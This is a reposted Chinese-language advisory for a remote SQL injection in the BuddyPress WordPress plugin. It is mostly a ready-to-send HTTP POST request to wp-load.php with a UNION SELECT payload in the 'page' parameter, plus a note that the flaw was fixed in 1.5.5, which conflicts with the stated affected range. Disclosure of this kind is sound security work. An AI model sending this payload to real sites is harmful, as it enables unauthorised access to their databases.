好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

Wordpress插件Buddypress远程SQL注射及修复 - 网站安全

标题: Buddypress plugin of Wordpress remote SQL Injection 作者: Ivan Terkin 类型: Remote Exploit 漏洞 : Remote SQL Injection 软件 下载 地址: buddypress.org 影响版本: 1.5.5及以下 测试平台: Buddypress 1.5.4     POST /wp-load.php HTTP/1.1 User-Agent: Mozilla Host: www.2cto.com Accept: */* Referer: http://www.2cto.com /activity/?s=b Connection: Keep-Alive Content-Length: 153 Content-Type: application/x-www-form-urlencoded   action=activity_widget_filter&page=1%26exclude%3d1)and(1=0)UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))%3b--+   修复方案: 已经报告给官方并且在 1.5.5版进行了修复

查看更多关于Wordpress插件Buddypress远程SQL注射及修复 - 网站安全的详细内容...

声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did12250
  阅读:52次

上一篇: 新浪房产文件遍历及任意文件下载漏洞 - 网站安

下一篇:VC团SQL注射导致拒绝服务漏洞及修复 - 网站安全

相关资讯